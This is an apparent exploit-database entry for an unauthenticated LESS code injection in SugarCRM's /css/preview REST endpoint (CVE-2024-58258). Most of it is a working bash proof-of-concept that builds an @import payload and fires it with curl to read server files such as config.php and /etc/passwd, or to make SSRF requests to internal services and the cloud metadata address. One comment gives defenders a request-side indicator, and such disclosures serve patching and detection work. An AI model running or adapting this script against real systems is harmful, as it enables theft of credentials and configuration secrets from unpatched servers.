
# Exploit Title : SugarCRM 14.0.0 - SSRF/Code Injection
# Author: Egidio Romano aka EgiX
# Email : n0b0d13s@gmail.com

# Software Link: https://www.sugarcrm.com
# Affected Versions: All commercial versions before 13.0.4 and 14.0.1.
# CVE Reference: CVE-2024-58258
# Vulnerability Description:

User input passed through GET parameters to the /css/preview REST API
endpoint is not properly sanitized before being parsed as LESS code. This can
be exploited by remote, unauthenticated attackers to inject and execute
arbitrary LESS directives. By abusing the @import LESS statement, an
attacker can trigger Server-Side Request Forgery (SSRF) or read arbitrary
local files on the web server, potentially leading to the disclosure of
sensitive information.

# Proof of Concept:

#!/bin/bash
#
# PoC driver for the SugarCRM css/preview LESS injection described in the
# header above.  Usage and examples are printed by the argument check below.

# Banner: a leading blank line followed by three fixed lines.
printf '\n'
printf '%s\n' \
  '+----------------------------------------------------------------------+' \
  '| SugarCRM <= 14.0.0 (css/preview) LESS Code Injection Exploit by EgiX |' \
  '+----------------------------------------------------------------------+'

# Exactly two arguments are required: the SugarCRM base URL and the local
# file path or URL to fetch.  Anything else prints the usage text (to stdout,
# as before) and exits with status 1.
if (( $# != 2 )); then
  printf '\nUsage.....: %s <SugarCRM URL> <Local File or SSRF URL>\n' "$0"
  printf "\nExample...: %s 'http://localhost/sugarcrm/' 'config.php'" "$0"
  printf "\nExample...: %s 'http://localhost/sugarcrm/' '/etc/passwd'" "$0"
  printf "\nExample...: %s 'https://www.sugarcrm.com/' 'http://localhost:9200/_search'" "$0"
  printf "\nExample...: %s 'https://www.sugarcrm.com/' 'http://169.254.169.254/latest/meta-data/'\n\n" "$0"
  exit 1
fi

#######################################
# Percent-encode every byte of a string as lowercase %xx.  No byte is left
# unencoded, so the result can be dropped into a URL query string as-is.
# Arguments: $1 - string to encode
# Outputs:   encoded string on stdout, without a trailing newline
#######################################
urlencode() {
  local hex i out=
  # od -v keeps runs of identical bytes instead of collapsing them into "*".
  hex=$(printf '%s' "$1" | od -An -v -tx1 | tr -d ' \n')
  for (( i = 0; i < ${#hex}; i += 2 )); do
    out+="%${hex:i:2}"
  done
  printf '%s' "$out"
}

# Build the query-string payload.  The caller's path/URL ($2) is placed,
# unescaped, inside a single-quoted LESS string (a quote in $2 would break
# the directive); a second @import inlines the fixed sentinel "________",
# which the output handling below uses to find the end of the fetched data.
# The whole thing is percent-encoded by urlencode.
INJECTION=$(urlencode "1; @import (inline) '$2'; @import (inline) 'data:text/plain,________';//")
# One GET to the css/preview endpoint.  -s hides progress output; -k skips
# TLS certificate verification, so the request goes out even to hosts with
# an invalid or self-signed certificate.  For defenders: "@import (inline)"
# inside the query string of rest/v10/css/preview is the request-side
# indicator of this PoC.
RESPONSE=$(curl -ks "${1}rest/v10/css/preview?baseUrl=1¶m=${INJECTION}")

# Presence of the sentinel in the response is treated as success.
if echo "$RESPONSE" | grep -q "________"; then
  echo -e "\nOutput for '$2':\n"
  # Print everything up to the first sentinel line, then drop that line.
  echo "$RESPONSE" | sed '/________/q' | grep -v '________'
  echo
else
  echo -e "\nError: exploit failed!\n"
  exit 2
fi
# Credits: Vulnerability discovered by Egidio Romano.
# Original Advisory: http://karmainsecurity.com/KIS-2025-04
# Other References: https://support.sugarcrm.com/resources/security/sugarcrm-sa-2024-059/